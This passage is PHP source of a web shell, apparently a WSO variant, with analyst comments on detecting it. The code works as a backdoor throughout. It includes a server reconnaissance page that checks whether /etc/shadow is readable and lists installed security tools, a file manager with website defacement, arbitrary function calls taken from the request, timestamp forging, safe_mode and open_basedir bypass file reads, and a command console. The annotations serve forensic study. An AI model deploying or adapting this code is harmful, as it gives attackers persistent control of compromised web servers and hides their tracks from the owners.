          $shade = '#00BB00';
      }
      return '<font color=' . $shade . '><b>' . perms(@fileperms($f)) . '</b></font>';
  }
  545.  
  // Fallback scandir() for runtimes that lack the built-in function.
  // Returns the entries of $dir in the order readdir() yields them, including '.' and '..'.
  546. if(!function_exists("scandir")) {
  547. function scandir($dir) {
  548. $dh = opendir($dir);
  549. while (false !== ($filename = readdir($dh))) {
  550. $files[] = $filename;
  551. }
  552. return $files;
  553. }
  554. }
  555.  
  // 'SecInfo' page: prints a survey of the host's configuration and defences.
  // It reports PHP hardening settings, available database client libraries, and on non-Windows
  // hosts whether /etc/passwd and /etc/shadow are readable, which build tools, downloaders and
  // security products are installed, and the contents of /etc/hosts and /etc/fstab.
  // Most of this is gathered by running commands through ex() and which(), so loading the page
  // starts many short-lived child processes under the web-server account.
  556. function actionSecInfo() {
  557. printHeader();
  558. echo '<h1>Server security information</h1><div class=content>';
  // Prints one "label: value" row, skipping empty values; multi-line values go in a <pre> block.
  // The value is echoed without HTML escaping.
  559. function showSecParam($n, $v) {
  560. $v = trim($v);
  561. if($v) {
  562. echo '<span>'.$n.': </span>';
  563. if(strpos($v, "\n") === false)
  564. echo $v.'<br>';
  565. else
  566. echo '<pre class=ml1>'.$v.'</pre>';
  567. }
  568. }
  569.  
  // PHP-level restrictions that would limit the script: disable_functions, open_basedir and
  // the safe_mode directories.
  570. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  571. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  572. showSecParam('Open base dir', @ini_get('open_basedir'));
  573. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  574. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  575. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  // Database client support, detected by the presence of each extension's functions.
  576. $temp=array();
  577. if(function_exists('mysql_get_client_info'))
  578. $temp[] = "MySql (".mysql_get_client_info().")";
  579. if(function_exists('mssql_connect'))
  580. $temp[] = "MSSQL";
  581. if(function_exists('pg_connect'))
  582. $temp[] = "PostgreSQL";
  583. if(function_exists('oci_connect'))
  584. $temp[] = "Oracle";
  585. showSecParam('Supported databases', implode(', ', $temp));
  586. echo '<br>';
  587.  
  588. if( $GLOBALS['os'] == 'nix' ) {
  589. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  // Names of antivirus, rootkit-checker, firewall, IDS and log-monitoring programs. Each is
  // probed with which() and the ones found are listed under the label 'Danger'.
  590. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  591. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  // Reports whether the account database files are readable by the PHP process and links
  // to the file viewer for them.
  592. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  593. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  594. showSecParam('OS version', @file_get_contents('/proc/version'));
  595. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  // The command-based probes below run only when safe_mode is off.
  596. if(!$GLOBALS['safe_mode']) {
  597. echo '<br>';
  598. $temp=array();
  599. foreach ($userful as $item)
  600. if(which($item)){$temp[]=$item;}
  601. showSecParam('Userful', implode(', ',$temp));
  602. $temp=array();
  603. foreach ($danger as $item)
  604. if(which($item)){$temp[]=$item;}
  605. showSecParam('Danger', implode(', ',$temp));
  606. $temp=array();
  607. foreach ($downloaders as $item)
  608. if(which($item)){$temp[]=$item;}
  609. showSecParam('Downloaders', implode(', ',$temp));
  610. echo '<br/>';
  611. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  612. showSecParam('HDD space', ex('df -h'));
  613. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  614. }
  615. } else {
  // Windows branch: version, account policy and local user list via built-in commands.
  616. showSecParam('OS Version',ex('ver'));
  617. showSecParam('Account Settings',ex('net accounts'));
  618. showSecParam('User Accounts',ex('net user'));
  619. }
  620. echo '</div>';
  621. printFooter();
  622. }
  623.  
  624. function actionFilesMan() {
  625. printHeader();
  626. echo '<h1>File manager</h1><div class=content>';
  627. if(isset($_POST['p1']) && $_POST['p1']!='deface') {
  628. switch($_POST['p1']) {
  629. case 'uploadFile':
  630. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  631. echo "Can't upload file!";
  632. break;
  633. break;
  634. case 'mkdir':
  635. if(!@mkdir($_POST['p2']))
  636. echo "Can't create new dir";
  637. break;
  638. case 'delete':
  639. function deleteDir($path) {
  640. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  641. $dh = opendir($path);
  642. while ( ($item = readdir($dh) ) !== false) {
  643. $item = $path.$item;
  644. if ( (basename($item) == "..") || (basename($item) == ".") )
  645. continue;
  646. $type = filetype($item);
  647. if ($type == "dir")
  648. deleteDir($item);
  649. else
  650. @unlink($item);
  651. }
  652. closedir($dh);
  653. rmdir($path);
  654. }
  655. if(is_array(@$_POST['f']))
  656. foreach($_POST['f'] as $f) {
  657. $f = urldecode($f);
  658. if(is_dir($f))
  659. deleteDir($f);
  660. else
  661. @unlink($f);
  662. }
  663. break;
  664.  
  665.  
  666.  
  667.  
  668. case 'paste':
  669. if($_SESSION['act'] == 'copy') {
  670. function copy_paste($c,$s,$d){
  671. if(is_dir($c.$s)){
  672. mkdir($d.$s);
  673. $h = opendir($c.$s);
  674. while (($f = readdir($h)) !== false)
  675. if (($f != ".") and ($f != "..")) {
  676. copy_paste($c.$s.'/',$f, $d.$s.'/');
  677. }
  678. } elseif(is_file($c.$s)) {
  679. @copy($c.$s, $d.$s);
  680. }
  681. }
  682. foreach($_SESSION['f'] as $f)
  683. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
  684. } elseif($_SESSION['act'] == 'move') {
  685. function move_paste($c,$s,$d){
  686. if(is_dir($c.$s)){
  687. mkdir($d.$s);
  688. $h = opendir($c.$s);
  689. while (($f = readdir($h)) !== false)
  690. if (($f != ".") and ($f != "..")) {
  691. copy_paste($c.$s.'/',$f, $d.$s.'/');
  692. }
  693. } elseif(is_file($c.$s)) {
  694. @copy($c.$s, $d.$s);
  695. }
  696. }
  697. foreach($_SESSION['f'] as $f)
  698. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  699. }
  700. unset($_SESSION['f']);
  701. break;
  702. default:
  703. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  704. $_SESSION['act'] = @$_POST['p1'];
  705. $_SESSION['f'] = @$_POST['f'];
  706. foreach($_SESSION['f'] as $k => $f)
  707. $_SESSION['f'][$k] = urldecode($f);
  708. $_SESSION['cwd'] = @$_POST['c'];
  709. }
  710. break;
  711. }
  712. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  713. }
  714.  
  715. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  716. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
  717. global $sort;
  718. $sort = array('name', 1);
  719. if(!empty($_POST['p1'])) {
  720. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  721. $sort = array($match[1], (int)$match[2]);
  722. }
  723. echo '<script>
  724. function sa() {
  725. for(i=0;i<document.files.elements.length;i++)
  726. if(document.files.elements[i].type == \'checkbox\')
  727. document.files.elements[i].checked = document.files.elements[0].checked;
  728. }
  729. </script>
  730. <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
  731. <form name=files method=post>';
  732. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  733. $dirs = $files = $links = array();
  734. $n = count($dirContent);
  735. for($i=0;$i<$n;$i++) {
  736. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  737. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  738. $tmp = array('name' => $dirContent[$i],
  739. 'path' => $GLOBALS['cwd'].$dirContent[$i],
  740. 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  741. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  742. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  743. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  744. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  745. );
  746. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  747. $files[] = array_merge($tmp, array('type' => 'file'));
  748. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  749. $links[] = array_merge($tmp, array('type' => 'link'));
  750. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  751. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  752. }
  753. $GLOBALS['sort'] = $sort;
  /**
   * usort() comparator for the directory-listing rows.
   *
   * Reads the column name and direction flag from $GLOBALS['sort']. Every column
   * except 'size' is compared with strcmp(); 'size' is compared numerically.
   * A truthy direction flag keeps the order, a falsy one inverts it.
   * The 'size' branch never returns 0: rows with equal sizes compare as "greater".
   */
  754. function cmp($a, $b) {
  755. if($GLOBALS['sort'][0] != 'size')
  756. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  757. else
  758. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  759. }
  760. usort($files, "cmp");
  761. usort($dirs, "cmp");
  762. usort($links, "cmp");
  763. $files = array_merge($dirs, $links, $files);
  764. $l = 0;
  765. foreach($files as $f) {
  766. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  767. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  768. $l = $l?0:1;
  769. }
  770. echo '<tr><td colspan=5>
  771. <input type=hidden name=a value=\'FilesMan\'>
  772. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  773. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  774. <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
  775. if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
  776. echo '</select>&nbsp;<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="index.php" size="10"/>&nbsp;<input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add your Deface"></td></tr>
  777. </form></table></div>';
  778. printFooter();
  779. }
  780.  
  /**
   * "String conversions" panel: applies the PHP function named in $_POST['p1']
   * to $_POST['p2'] and prints the result.
   *
   * Analyst note: the $stringTools list below only fills the <select>; it is
   * never used to validate the request. Both call sites gate the posted name
   * with function_exists() alone, so the function that runs is chosen entirely
   * by the request body. A variable-function call on a $_POST value is a strong
   * static indicator when scanning a web root for this family of shells.
   */
  781. function actionStringTools() {
  // Fallback helpers, declared only when a function of that name does not exist yet.
  // This hex2bin() fallback returns a string of binary digits, not raw bytes.
  782. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  783. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  784. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  785. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  786.  
  // AJAX branch: the reply is a JavaScript snippet that fills #strOutput,
  // preceded by its own length on a separate line, and the script exits.
  787. if(isset($_POST['ajax'])) {
  // Session flag keyed by md5(HTTP_HOST).'ajax' remembers the state of the AJAX checkbox.
  788. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  789. ob_start();
  // Request-controlled function name; function_exists() is the only check.
  790. if(function_exists($_POST['p1']))
  791. echo $_POST['p1']($_POST['p2']);
  792. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  793. echo strlen($temp), "\n", $temp;
  794. exit;
  795. }
  796. printHeader();
  797. echo '<h1>String conversions</h1><div class=content>';
  // Label => function name; used for the <select> options only.
  798. $stringTools = array(
  799. 'Base64 encode' => 'base64_encode',
  800. 'Base64 decode' => 'base64_decode',
  801. 'Url encode' => 'urlencode',
  802. 'Url decode' => 'urldecode',
  803. 'Full urlencode' => 'full_urlencode',
  804. 'md5 hash' => 'md5',
  805. 'sha1 hash' => 'sha1',
  806. 'crypt' => 'crypt',
  807. 'CRC32' => 'crc32',
  808. 'ASCII to HEX' => 'ascii2hex',
  809. 'HEX to ASCII' => 'hex2ascii',
  810. 'HEX to DEC' => 'hexdec',
  811. 'HEX to BIN' => 'hex2bin',
  812. 'DEC to HEX' => 'dechex',
  813. 'DEC to BIN' => 'decbin',
  814. 'BIN to HEX' => 'bin2hex',
  815. 'BIN to DEC' => 'bindec',
  816. 'String to lower case' => 'strtolower',
  817. 'String to upper case' => 'strtoupper',
  818. 'Htmlspecialchars' => 'htmlspecialchars',
  819. 'String length' => 'strlen',
  820. );
  // A non-AJAX submission clears the remembered AJAX preference.
  821. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  822. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  823. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  824. foreach($stringTools as $k => $v)
  825. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  826. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  // Non-AJAX call site: same function_exists()-only gate as above; output is HTML-escaped.
  827. if(!empty($_POST['p1'])) {
  828. if(function_exists($_POST['p1']))
  829. echo htmlspecialchars($_POST['p1']($_POST['p2']));
  830. }
  831. echo"</pre></div>";
  832. printFooter();
  833. }
  834.  
  /**
   * "File tools" panel: performs one operation on the path in $_POST['p1'].
   *
   * $_POST['p2'] selects the operation (download, mkfile, view, highlight, chmod,
   * edit, hexdump, rename, touch; empty means view) and $_POST['p3'] carries its
   * argument. Nothing in this function restricts p1 to a directory, so the reach
   * is whatever the PHP process user can read or write.
   *
   * Analyst note: the 'touch' case sets access and modification time to a value
   * taken from the request, so mtime/atime of files on a host where this shell
   * ran are not reliable timeline evidence. The 'edit', 'rename' and 'chmod'
   * cases change content, names and modes of existing files; compare the web
   * root against a known-good deployment rather than trusting timestamps.
   */
  835. function actionFilesTools() {
  // The listing URL-encodes file names before posting them; decode once here.
  836. if( isset($_POST['p1']) )
  837. $_POST['p1'] = urldecode($_POST['p1']);
  // download: streams the file as a gzip-buffered attachment and exits.
  838. if(@$_POST['p2']=='download') {
  839. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  840. ob_start("ob_gzhandler", 4096);
  841. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  842. if (function_exists("mime_content_type")) {
  843. $type = @mime_content_type($_POST['p1']);
  844. header("Content-Type: ".$type);
  845. }
  846. $fp = @fopen($_POST['p1'], "r");
  847. if($fp) {
  848. while(!@feof($fp))
  849. echo @fread($fp, 1024);
  850. fclose($fp);
  851. }
  // Directory download is an empty stub.
  852. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  853.  
  854. }
  855. exit;
  856. }
  // mkfile: creates an empty file when the path does not exist, then falls through to 'edit'.
  857. if( @$_POST['p2'] == 'mkfile' ) {
  858. if(!file_exists($_POST['p1'])) {
  859. $fp = @fopen($_POST['p1'], 'w');
  860. if($fp) {
  861. $_POST['p2'] = "edit";
  862. fclose($fp);
  863. }
  864. }
  865. }
  866. printHeader();
  867. echo '<h1>File tools</h1><div class=content>';
  868. if( !file_exists(@$_POST['p1']) ) {
  869. echo 'File not exists';
  870. printFooter();
  871. return;
  872. }
  // Metadata header: name, size, permissions, owner/group and the three timestamps.
  873. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  874. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  875. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  876. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  877. if( empty($_POST['p2']) )
  878. $_POST['p2'] = 'view';
  // Regular files get the full tab set; anything else only chmod/rename/touch.
  879. if( is_file($_POST['p1']) )
  880. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  881. else
  882. $m = array('Chmod', 'Rename', 'Touch');
  883. foreach($m as $v)
  884. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  885. echo '<br><br>';
  886. switch($_POST['p2']) {
  // view: prints the file HTML-escaped in 1024-byte reads.
  887. case 'view':
  888. echo '<pre class=ml1>';
  889. $fp = @fopen($_POST['p1'], 'r');
  890. if($fp) {
  891. while( !@feof($fp) )
  892. echo htmlspecialchars(@fread($fp, 1024));
  893. @fclose($fp);
  894. }
  895. echo '</pre>';
  896. break;
  // highlight: PHP syntax highlighting, with <span> rewritten to <font>.
  897. case 'highlight':
  898. if( is_readable($_POST['p1']) ) {
  899. echo '<div class=ml1 style="background-color: black;color:black;">';
  900. $code = highlight_file($_POST['p1'],true);
  901. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  902. }
  903. break;
  // chmod: p3 is read digit by digit as an octal mode string.
  904. case 'chmod':
  905. if( !empty($_POST['p3']) ) {
  906. $perms = 0;
  907. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  908. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  909. if(!@chmod($_POST['p1'], $perms))
  910. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  911. else
  912. die('<script>g(null,null,null,null,"")</script>');
  913. }
  914. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  915. break;
  // edit: overwrites the whole file with p3, then shows the current content in a textarea.
  916. case 'edit':
  917. if( !is_writable($_POST['p1'])) {
  918. echo 'File isn\'t writeable';
  919. break;
  920. }
  921. if( !empty($_POST['p3']) ) {
  922. @file_put_contents($_POST['p1'],$_POST['p3']);
  923. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
  924. }
  925. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  926. $fp = @fopen($_POST['p1'], 'r');
  927. if($fp) {
  928. while( !@feof($fp) )
  929. echo htmlspecialchars(@fread($fp, 1024));
  930. @fclose($fp);
  931. }
  932. echo '</textarea><input type=submit value=">>"></form>';
  933. break;
  // hexdump: loads the whole file into memory; $h holds the offset, hex and text columns,
  // 32 bytes per row. Bytes 0, 9, 10 and 13 are shown as a space in the text column.
  934. case 'hexdump':
  935. $c = @file_get_contents($_POST['p1']);
  936. $n = 0;
  937. $h = array('00000000<br>','','');
  938. $len = strlen($c);
  939. for ($i=0; $i<$len; ++$i) {
  940. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  941. switch ( ord($c[$i]) ) {
  942. case 0: $h[2] .= ' '; break;
  943. case 9: $h[2] .= ' '; break;
  944. case 10: $h[2] .= ' '; break;
  945. case 13: $h[2] .= ' '; break;
  946. default: $h[2] .= $c[$i]; break;
  947. }
  948. $n++;
  949. if ($n == 32) {
  950. $n = 0;
  951. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  952. $h[1] .= '<br>';
  953. $h[2] .= "\n";
  954. }
  955. }
  956. echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#red><pre>'.$h[1].'</pre></td><td bgcolor=#red><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  957. break;
  // rename: p3 is the new path; on success the panel reloads on the new name.
  958. case 'rename':
  959. if( !empty($_POST['p3']) ) {
  960. if(!@rename($_POST['p1'], $_POST['p3']))
  961. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
  962. else
  963. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  964. }
  965. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  966. break;
  // touch: p3 is parsed with strtotime() and applied as both modification and access time.
  967. case 'touch':
  968. if( !empty($_POST['p3']) ) {
  969. $time = strtotime($_POST['p3']);
  970. if($time) {
  971. if(@touch($_POST['p1'],$time,$time))
  972. die('<script>g(null,null,null,null,"")</script>');
  973. else {
  974. echo 'Fail!<script>document.mf.p3.value="";</script>';
  975. }
  976. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  977. }
  978. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  979. break;
  // mkfile is handled before the header is printed; nothing left to do here.
  980. case 'mkfile':
  981.  
  982. break;
  983. }
  984. echo '</div>';
  985. printFooter();
  986. }
  987.  
  /**
   * "Safe mode bypass" panel: runs one of six read/list routines selected by
   * $_POST['p1'] on the value in $_POST['p2'] (and $_POST['p3'] for case 5),
   * captures the output, then renders the forms and the captured text.
   *
   * Analyst note: each case reaches the file system or account database through
   * a different API (copy() with the compress.zlib:// wrapper, glob(), cURL
   * file://, ini_restore() + include, posix_getpwuid(), imap_open()) instead of
   * a plain fopen(). safe_mode itself was removed in PHP 5.4, so this panel
   * mainly matters on legacy hosts; the list is still a useful checklist of
   * functions and extensions to disable or unload where they are not needed.
   */
  988. function actionSafeMode() {
  989. $temp='';
  990. ob_start();
  991. switch($_POST['p1']) {
  992. case 1:
  // $test is never assigned in this function, so tempnam() receives an empty directory argument.
  993. $temp=@tempnam($test, 'cx');
  994. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  995. echo @file_get_contents($temp);
  996. unlink($temp);
  997. } else
  998. echo 'Sorry... Can\'t open file';
  999. break;
  // Lists paths matching the posted prefix followed by '*'.
  1000. case 2:
  1001. $files = glob($_POST['p2'].'*');
  1002. if( is_array($files) )
  1003. foreach ($files as $filename)
  1004. echo $filename."\n";
  1005. break;
  // Builds a file:// URL from the posted path, a NUL byte and this script's own path.
  1006. case 3:
  1007. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  1008. curl_exec($ch);
  1009. break;
  // include() executes the target if it contains PHP; it does not merely print it.
  1010. case 4:
  1011. ini_restore("safe_mode");
  1012. ini_restore("open_basedir");
  1013. include($_POST['p2']);
  1014. break;
  // Walks the numeric uid range p2..p3 and prints each account record joined with ':'.
  1015. case 5:
  1016. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  1017. $uid = @posix_getpwuid($_POST['p2']);
  1018. if ($uid)
  1019. echo join(':',$uid)."\n";
  1020. }
  1021. break;
  // Only attempted when the imap extension is loaded.
  1022. case 6:
  1023. if(!function_exists('imap_open'))break;
  1024. $stream = imap_open($_POST['p2'], "", "");
  1025. if ($stream == FALSE)
  1026. break;
  1027. echo imap_body($stream, 1);
  1028. imap_close($stream);
  1029. break;
  1030. }
  // $temp is reused: from here on it holds everything the selected case printed.
  1031. $temp = ob_get_clean();
  1032. printHeader();
  1033. echo '<h1>Safe mode bypass</h1><div class=content>';
  1034. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
  // The captured output is echoed without HTML escaping.
  1035. if($temp)
  1036. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  1037. echo '</div>';
  1038. printFooter();
  1039. }
  1040.  
  /**
   * "Console" panel: passes $_POST['p1'] to ex() and shows what it returns.
   *
   * ex() and $GLOBALS['aliases'] are defined outside this section; ex() is
   * presumably the shell's command-execution wrapper (confirm against its
   * definition).
   *
   * Analyst note: on the host this activity appears as child processes of the
   * web server / PHP worker account. Process-creation telemetry for that
   * account, correlated with POST requests to a single script, is the most
   * direct way to detect and scope use of this panel.
   */
  1041. function actionConsole() {
  // AJAX branch: the reply is JavaScript that appends to the output textarea,
  // preceded by its own length on a separate line, and the script exits.
  1042. if(isset($_POST['ajax'])) {
  1043. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  1044. ob_start();
  1045. echo "document.cf.cmd.value='';\n";
  // Output is converted from the posted charset to UTF-8 and escaped for a single-quoted JS string.
  1046. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
  // A trailing "cd <dir>" is mirrored with chdir() so the hidden cwd form field follows it.
  1047. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  1048. if(@chdir($match[1])) {
  1049. $GLOBALS['cwd'] = @getcwd();
  1050. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  1051. }
  1052. }
  1053. echo "document.cf.output.value+='".$temp."';";
  1054. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  1055. $temp = ob_get_clean();
  1056. echo strlen($temp), "\n", $temp;
  1057. exit;
  1058. }
  1059. printHeader();
  1060.  
  // Client-side command history: key codes 38 and 40 step through the cmds array.
  1061. echo '<script>
  1062. if(window.Event) window.captureEvents(Event.KEYDOWN);
  1063. var cmds = new Array("");
  1064. var cur = 0;
  1065. function kp(e) {
  1066. var n = (window.Event) ? e.which : e.keyCode;
  1067. if(n == 38) {
  1068. cur--;
  1069. if(cur>=0)
  1070. document.cf.cmd.value = cmds[cur];
  1071. else
